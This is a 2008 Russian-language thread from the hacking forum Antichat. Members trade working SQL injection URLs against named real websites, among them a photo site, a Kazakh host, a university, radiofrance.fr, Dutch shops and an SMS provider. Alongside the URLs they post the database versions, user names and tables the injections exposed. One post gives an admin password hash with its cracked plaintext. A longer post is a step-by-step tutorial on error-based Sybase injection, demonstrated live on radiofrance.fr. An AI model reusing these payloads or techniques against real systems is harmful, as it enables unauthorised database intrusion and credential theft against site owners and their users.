Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

19.03.2008, 01:23
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме: 5386281
Репутация:
1177
|
|
www.masterphoto.ru
5.0.45-community/master_masterpho@localhost/master_masterphoto
http://www.masterphoto.ru/news/news.php?uid=-1+union+select+1,concat(name,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from +user/*
Таблицы:
user
Поля:
name
email
Поля с паролями не подобрал
|
|
|

19.03.2008, 06:03
|
|
Участник форума
Регистрация: 05.10.2006
Сообщений: 133
Провел на форуме: 548338
Репутация:
165
|
|
Сообщение от Tigger
www.masterphoto.ru
5.0.45-community/master_masterpho@localhost/master_masterphoto
http://www.masterphoto.ru/news/news.php?uid=-1+union+select+1,concat(name,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from +user/*
Таблицы:
user
Поля:
name
email
Поля с паролями не подобрал
http://www.masterphoto.ru/news/news.php?uid=-1+union+select+1,concat(user_password,char(58)),3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+php bb_users%20where%20user_id=2/*
masterphoto:786c2704f76e06e44aad1e0213d26018:gbcbr henj
http://www.masterphoto.ru/forum/admin/
там еше и форум есть а я спать 
Последний раз редактировалось Muhacir; 19.03.2008 в 06:09..
|
|
|

19.03.2008, 16:59
|
|
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
Провел на форуме: 645316
Репутация:
327
|
|
Крупный хостиг в зоне кз
http://user.kz/files/cifry.php?sid=-9965481+union+select+1,2,3,4,5,6,7/*
http://handbook.ecu.edu.au/CourseStructure.asp?disyear=2008+and+1=1--&CID=1&USID=0&UCID=0&UID=0&Ver=0&HB=HB&SC=
|
|
|

19.03.2008, 17:14
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
ReVOLVeR
Хорош прикалываться
1.баян
2.вобще люкс: твой пост
_http://forum.antichat.ru/showpost.php?p=621958&postcount=5162
|
|
|

19.03.2008, 19:30
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме: 5939734
Репутация:
1917
|
|
Хм, чето только мускул один, есть же и другие: Postgre, Mssql, Sybase и т.д. осбенно мало на форумах постят про Sybase...
вобщем Sybase использует Transact-SQL, как например MS Access и MSSQL но они отличаются немного, вот пример:
Получаем данные через вывод сообщения об ошибке приведения типов.
версия:
Код:
http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(@@version))--
Adaptive Server Enterprise/12.5.0.3/EBF 11450 ESD#4/P/Linux Intel/Linux 2.4.18-18.7.xsmp i686/rel12503/1940/32-bit/OPT/Sun Sep 21 03:10:00 2003
текущий пользователь:
Код:
http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(user_name()))--
имена бд:
Код:
http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(dbname)+from+master..syslogins))--
следующее имя бд:
Код:
http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(dbname)+from+master..syslogins+where+dbname+not+in+(0x73796273797374656D6462)))--
здесь 0x73796273797374656D6462=hex('sybsystemdb')
следующее имя:
Код:
http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(dbname)+from+master..syslogins+where+dbname+not+in+(0x726670726F64,0x73796273797374656D6462)))--
0x726670726F64=hex('rfprod') и т.д.
узнаем таблицы в бд rfprod (в других по аналогии):
Код:
http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(name||0x3a||convert(char,id))+from+rfprod..sysobjects+where+type=0x55))--
wifi_reactions:1785877529
тут надо пояснить, || -знак конкатенации (объединения) в sybase, convert(char,id) нужен для того, что бы привести числовое поле id (очень нужное) к символьному типу, иначе возникнет ошибка несоответствия типов, from+rfprod..sysobjects означает то, что мы выбираем значения из системной таблицы sysobjects базы данных rfprod, в этой таблице хранятся записи об объектах этой бд, но нам нужны не все объекты, а только пользовательские таблицы, они имеют тип U, hex('U')=0x55 (where+type=0x55) надеюсь с этим все понятно
узнаем имя следующей таблицы:
Код:
http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(name||0x3a||convert(char,id))+from+rfprod..sysobjects+where+type=0x55+and+id+not+in+(1785877529)))--
wifi_inscriptions:1753877415
поясню, т.к. id уникально, для перебора удобнее использовать именно его
узнаем поля таблицы wifi_reactions (id=1785877529) (другие таблицы по аналогии):
Код:
http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(name||0x3a||convert(char,colid))+from+rfprod..syscolumns+where+id=1785877529))--
Тут тоже нужно пояснить: colid - это идентификационный номер поля, он не несет смысловой нагрузги, но его удобно использовать при переборе, from+rfprod..syscolumns означает то, что мы выбираем значения из системной таблицы syscolumns базы данных rfprod, в этой таблице хранятся записи об колонках этой бд! (а не только одной таблицы), where+id=1785877529 - указывает колонки какой таблицы выбирать, я ранее говорил, что id таблицы очень важное для нас значение, так вот определение того, к какой таблице принадлежит имя поля, происходит именно по id таблицы и только по id
узнаем имя следующего поля:
Код:
http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(name||0x3a||convert(char,colid))+from+rfprod..syscolumns+where+id=1785877529+and+colid+not+in+(4)))--
и т.д
получаем данные из таблицы wifi_reactions:
Код:
http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(convert(varchar,reactions)||0x3a||ville)+from+rfprod..wifi_reactions))--
utilisateur du wifi depuis ces:grenoble
что это такое, фиг его знает, но нам важны не данные, а принцип получения данных, convert(varchar,reactions) - нужен для того, что бы привести данные из поля reactions, которое имеет тип VARBINARY, к типу varchar для совместимости, если этого не сделать, появится ошибка несовместимости типов
Ну вроде пока все, так вот из обычного поста получилась небольшая статейка для новичков, об SQL-inj в SYBASE Adaptive Server Enterprise
ЗЫ в ASE жесткое разграничение прав пользователей, для пользователя может быть ограничен доступ не только к БД и таблице БД, но также и к отдельному полю таблицы
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 19.03.2008 в 19:35..
|
|
|

20.03.2008, 03:41
|
|
Постоянный
Регистрация: 30.09.2007
Сообщений: 815
Провел на форуме: 2590715
Репутация:
659
|
|
http://www.gallery1905.ru/news/more.php?id=-42+union+select+1,version(),3,4,5,6,7,8/*
|
|
|

20.03.2008, 04:23
|
|
Участник форума
Регистрация: 05.10.2006
Сообщений: 133
Провел на форуме: 548338
Репутация:
165
|
|
http://www.videoland.nl/index_film_record.php?id=4370455454+union+select+0 ,1,2+from+a
таблицы
http://www.seatsandsofas.nl/info.php?id=7&lang_id=1&country_id=1444'union+sele ct+0,1,2,3,4+from+users/*
+таблицa: admin
Последний раз редактировалось Muhacir; 20.03.2008 в 13:57..
|
|
|

20.03.2008, 22:13
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме: 7617458
Репутация:
3965
|
|
Сервс провайдер на рынке SMS
+ моя первая скуля.
http://melody.e-vostok.ru/info_video.php?id=501&service=10671'+UNION+SELECT+ 1,2,3,version(),user(),6,7,8,9/*
user: sms@212.111.95.84
Log: Debian_7etch4-log
version: 5.0.32
__________________
BlackHat. MoDL
|
|
|

20.03.2008, 22:40
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме: 295283
Репутация:
69
|
|
http://td-postavka.com/news_one.php?news_id=-1411+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26/*
csuser@localhost.localdomain
citysite
4.0.16
|
|
|

21.03.2008, 00:54
|
|
Banned
Регистрация: 06.01.2008
Сообщений: 413
Провел на форуме: 1301036
Репутация:
1334
|
|
webmonger.net
http://www.webmonger.net/policiesdetail.php?id=99999+union+select+1,VERSION (),3/*
VERSION: 4.1.22-standard
USER: webmonge@localhost
DATABASE: webmonge_webmonger
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|